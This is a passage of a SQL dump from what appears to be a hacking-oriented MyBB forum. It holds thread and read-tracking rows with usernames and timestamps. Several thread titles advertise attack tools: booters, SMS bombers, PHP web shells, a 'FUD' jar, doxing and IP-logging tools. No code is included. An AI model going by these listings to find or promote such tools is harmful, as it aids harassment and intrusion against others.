'1352518437', 'Triple H', '4', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1229', '49', 'Just a quick suggestion.', '0', '0', '0', '333', 'illest', '1352431355', '7270', '1352521504', 'mothered', '205', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1230', '49', 'great suggestion', '0', '19', '0', '257', 'XxTREYZxX', '1352451665', '7279', '1352537850', 'XxTREYZxX', '257', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1231', '15', '[link included]Skype Sms Bomber Super Hard & Heavy - WORLDWIDE', '0', '0', '0', '335', 'loser386', '1352452340', '7280', '1352500126', 'iTzIpod', '82', '11', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1232', '9', 'Adfoc.us Trick', '0', '0', '0', '53', 'sirchamp', '1352486031', '7289', '1352555401', 'bouabda', '341', '50', '10', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1233', '15', '[SALES] Sparky Java 2.0 | FUD Jar | 15 Domains | Addon:Skype Resolver| Booter', '0', '0', '0', '61', 'NXK', '1352491084', '7293', '1352491084', 'NXK', '61', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1234', '46', 'Did someone ever hack you through phishing?', '0', '0', '0', '4', 'Triple H', '1352517114', '7299', '1352635342', 'mothered', '205', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1235', '42', 'Marijuana legalized in two US states', '0', '0', '0', '5', 'Timmy', '1352521201', '7313', '1352619728', 'RAND0M1ZER', '262', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1236', '3', 'CloudFlare Issues?', '0', '0', '0', '205', 'mothered', '1352521789', '7317', '1352662590', 't3h jok3r', '1', '42', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1237', '61', 'Suggestion for this section', '0', '0', '0', '5', 'Timmy', '1352521857', '7318', '1352597444', 'iTzIpod', '82', '10', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1238', '67', 'Slowlowirs Shell .PHP file', '0', '0', '0', '5', 'Timmy', '1352523436', '7322', '1352820202', 'HoverCatz', '67', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1239', '84', '800 shells', '0', '0', '0', '5', 'Timmy', '1352524746', '7323', '1352820667', 'HoverCatz', '67', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1240', '81', 'Some private shells', '0', '0', '0', '1', 't3h jok3r', '1352524892', '7324', '1352524892', 't3h jok3r', '1', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1241', '35', 'New Userbars- Voting', '0', '0', '0', '1', 't3h jok3r', '1352525168', '7325', '1352765262', 'Apathy', '2', '32', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1242', '34', 'Another thread design PSD', '0', '0', '0', '9', 'p420', '1352525738', '7327', '1352551639', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1243', '68', 'Simple Perl Booter', '0', '0', '0', '8', 'spacefish36', '1352527014', '7333', '1352527014', 'spacefish36', '8', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1244', '83', '[How to] Send a DMCA takedown notice', '0', '0', '0', '5', 'Timmy', '1352528646', '7338', '1352528646', 'Timmy', '5', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1245', '28', 'New Section Added in VIP tab', '0', '0', '0', '1', 't3h jok3r', '1352529862', '7340', '1352550776', 'iTzIpod', '82', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1246', '65', 'L33T Hacking Video', '0', '0', '0', '1', 't3h jok3r', '1352535067', '7345', '1352551572', 'iTzIpod', '82', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1247', '4', 'Hey Everybody!', '0', '0', '0', '342', 'Squirt1971', '1352571921', '7398', '1352642292', 'VirtualLegend', '228', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1248', '3', 'Recent Updates', '0', '0', '0', '1', 't3h jok3r', '1352577684', '7407', '1352662110', 'iTzIpod', '82', '37', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1249', '35', 'New Avatar', '0', '0', '0', '82', 'iTzIpod', '1352580089', '7412', '1352597485', 'iTzIpod', '82', '14', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1250', '61', 'Skype Responce { Skype Resolver, Email/Phone Doxer, Email/SMS Bomber, IP Logger}', '0', '0', '0', '62', 'R?????zo?', '1352588484', '7426', '1352589058', 'iTzIpod', '82', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1251', '3', '[Bug] Award Icons', '0', '0', '0', '82', 'iTzIpod', '1352598124', '7462', '1352603851', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1252', '49', '[Suggestion] Post cooldown', '0', '0', '0', '82', 'iTzIpod', '1352598223', '7463', '1352649992', 'sirchamp', '53', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1253', '7', 'Who\'s had a Toothache?', '0', '0', '0', '205', 'mothered', '1352634279', '7481', '1352771268', 'iTzIpod', '82', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1254', '65', 'Who\'s watched The Social Network movie?', '0', '0', '0', '205', 'mothered', '1352634721', '7482', '1352809466', 'mothered', '205', '10', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1255', '4', 'Wasssup?', '0', '0', '0', '345', 'ZetaHunter', '1352654955', '7495', '1352662960', 't3h jok3r', '1', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1256', '3', 'Recent Downtime and Forced to change password', '0', '0', '0', '1', 't3h jok3r', '1352761412', '7513', '1352823143', 'MinecraftGeek', '150', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1258', '47', 'eBook Givaway!', '0', '0', '0', '346', 'TheBlueCat97', '1352770535', '7535', '1352804815', 'TheBlueCat97', '346', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1259', '4', 'Centagon here!', '0', '0', '0', '334', 'Centagon', '1352785654', '7540', '1352809844', 'mothered', '205', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1260', '7', 'Post your setup!', '0', '0', '0', '334', 'Centagon', '1352785934', '7541', '1352785934', 'Centagon', '334', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1261', '29', 'How to get free XXX passwords! [EASY]', '0', '0', '0', '62', 'R?????zo?', '1352799074', '7543', '1352799136', 'Sin Cara', '54', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_threadsread`; CREATE TABLE `mybb_threadsread` ( `tid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` int(10) NOT NULL DEFAULT '0', UNIQUE KEY `tid` (`tid`,`uid`), KEY `dateline` (`dateline`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_threadsread` WRITE; INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('203', '342', '1352593366'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1249', '257', '1352619070'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('418', '82', '1352597515'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('719', '342', '1352663803'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '2', '1352433224'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '1', '1352516002'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('780', '323', '1352479024'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1012', '342', '1352593443'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '61', '1352516971'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '1', '1352607366'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '82', '1352769433'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '53', '1352822805'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1164', '53', '1352575345'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '82', '1352406798'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1164', '150', '1352411003'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1145', '1', '1352427117'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1050', '257', '1352595889'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '257', '1352767998'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '257', '1352594014'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('135', '342', '1352663807'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('418', '342', '1352606071'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('995', '342', '1352593475'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1145', '262', '1352422979'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('595', '262', '1352422992'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1169', '1', '1352661619'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '257', '1352617534'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('79', '82', '1352597032'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1173', '1', '1352661425'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '82', '1352604446'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '257', '1352594239'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1145', '53', '1352385714'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('487', '257', '1352619010'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('253', '257', '1352618347'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1091', '257', '1352552973'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '257', '1352618907'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('249', '257', '1352618452'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('989', '258', '1352454985'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1247', '257', '1352617338'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('418', '257', '1352593920'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('234', '323', '1352476098'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('26', '323', '1352479043'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('253', '7', '1352535775'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('487', '7', '1352536001'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '7', '1352535859'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('249', '7', '1352535815'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('190', '7', '1352535744'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('197', '7', '1352535948'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1091', '7', '1352535902'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1204', '1', '1352769423'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '53', '1352387090'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1149', '53', '1352659813'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1121', '53', '1352554315'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('565', '53', '1352554359'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1035', '53', '1352554384'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1091', '82', '1352551496'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('253', '82', '1352597764'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('487', '82', '1352597677'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('238', '82', '1352648045'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('249', '82', '1352648005'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('197', '82', '1352597636'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1204', '82', '1352375096'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1206', '258', '1352526319'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1203', '1', '1352391849'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1207', '82', '1352770510'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1118', '257', '1352679635'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('253', '1', '1352678864'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('197', '257', '1352618480'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('861', '5', '1352520969'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1209', '5', '1352530796'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '9', '1352525678'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '61', '1352405261'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '1', '1352393453'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1212', '54', '1352346733'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1214', '62', '1352454949'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1209', '62', '1352550254'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '62', '1352383940'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('646', '54', '1352437159'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '62', '1352503916'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1221', '205', '1352346568'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '82', '1352406789'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '53', '1352474251'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '150', '1352480030'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '53', '1352385708'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '228', '1352368831'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1208', '228', '1352389677'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '228', '1352642052'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1176', '346', '1352770341'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '4', '1352770052'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1207', '222', '1352770071'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '228', '1352410486'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1093', '346', '1352770004'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1096', '346', '1352769900'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1187', '346', '1352769875'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '346', '1352769785'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1219', '257', '1352767975'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1254', '257', '1352767961'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1254', '1', '1352767507'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1219', '2', '1352765645'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1254', '2', '1352765610'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1218', '1', '1352492873'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1253', '2', '1352765492'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '257', '1352767919'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1213', '1', '1352664918'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1248', '2', '1352765316'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1256', '2', '1352766717'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1241', '2', '1352765262'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '100', '1352342125'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1215', '100', '1352342143'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1195', '100', '1352342163'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('616', '100', '1352342197'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '205', '1352346695'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1220', '205', '1352346839'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('966', '61', '1352347133'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1222', '9', '1352391977'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1078', '9', '1352349637'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1223', '9', '1352350143'); INSERT INTO `mybb_threadsread` (`tid`, `uid`, `dateline`) VALUES ('1224', 